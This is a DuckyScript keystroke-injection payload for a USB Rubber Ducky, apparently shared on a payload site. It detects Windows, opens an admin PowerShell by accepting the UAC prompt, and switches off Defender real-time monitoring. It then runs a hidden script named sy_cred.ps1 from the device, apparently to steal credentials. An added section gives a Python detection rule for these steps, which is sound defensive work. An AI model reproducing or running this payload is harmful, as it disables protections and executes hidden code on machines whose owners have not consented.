Windows OS Passive Detection

Uploaded by slaxxer12
ATTACKMODE HID STORAGE

EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM

REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT


WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION


IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION

DEFINE #DUCKY_DRIVER_LABEL DUCKY


DEFINE #PS1 sy_cred.ps1

IF ($_OS == WINDOWS) THEN

DELAY 200
REM -----open Powershell as Admin
GUI r
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 400
LEFT
DELAY 150
ENTER
DELAY 500
STRINGLN_POWERSHELL

$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
Set-MpPreference -DisableRealtimeMonitoring $true
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden
exit

END_STRINGLN

END_IF
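
Detection-side view of the PowerShell lines typed above, as an added example that is not part of the uploaded payload: it matches the three behaviours (volume-label lookup, Set-MpPreference -DisableRealtimeMonitoring $true, hidden powershell -File) and alerts when the last two occur on one host within a short window. The record layout (time, host, text, shaped like script block log entries), the 30-second window, the host names and sample.ps1 are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# One rule per behaviour visible in the payload's typed PowerShell lines.
RULES = {
    "defender_rtm_off": re.compile(
        r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I),
    "volume_label_lookup": re.compile(
        r"Win32_LogicalDisk\b.*VolumeName\s+-eq\s+['\"][^'\"]+['\"]", re.I),
    "hidden_ps_file": re.compile(
        r"powershell(\.exe)?\b.*-WindowStyle\s+Hidden.*-File\s+\S+", re.I),
}
WINDOW = timedelta(seconds=30)  # assumed correlation window, tune per environment

def rec(ts, host, text):
    return {"time": datetime.fromisoformat(ts), "host": host, "text": text}

# Constructed sample records (not real logs); host names and file name are made up.
SAMPLE = [
    rec("2024-01-01T10:00:00", "WS01",
        "$d = (Get-CimInstance -ClassName Win32_LogicalDisk | "
        "Where-Object { $_.VolumeName -eq 'LABEL' }).DeviceID;cd $d"),
    rec("2024-01-01T10:00:01", "WS01", "Set-MpPreference -DisableRealtimeMonitoring $true"),
    rec("2024-01-01T10:00:02", "WS01",
        'Start-Process powershell.exe -ArgumentList "-NoProfile '
        '-WindowStyle Hidden -File sample.ps1" -WindowStyle Hidden'),
    rec("2024-01-01T09:00:00", "WS02", "Set-MpPreference -DisableRealtimeMonitoring $false"),
    rec("2024-01-01T11:00:00", "WS03", "Get-CimInstance -ClassName Win32_LogicalDisk"),
]

def match_rules(text):
    """Names of the rules whose pattern occurs in one logged script block."""
    return {name for name, rx in RULES.items() if rx.search(text)}

def correlate(records, window=WINDOW):
    """Alert per host where real-time monitoring is switched off and a hidden
    'powershell -File' starts no more than `window` later."""
    hits = {}
    for r in records:
        for name in match_rules(r["text"]):
            hits.setdefault(r["host"], []).append((r["time"], name))
    alerts = []
    for host, seen in sorted(hits.items()):
        off = [t for t, n in seen if n == "defender_rtm_off"]
        run = [t for t, n in seen if n == "hidden_ps_file"]
        if any(timedelta(0) <= b - a <= window for a in off for b in run):
            alerts.append({"host": host, "rules": sorted({n for _, n in seen})})
    return alerts
```

With Tamper Protection enabled, Defender ignores the Set-MpPreference change; event ID 5001 in the Defender operational log records when real-time protection is actually disabled.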
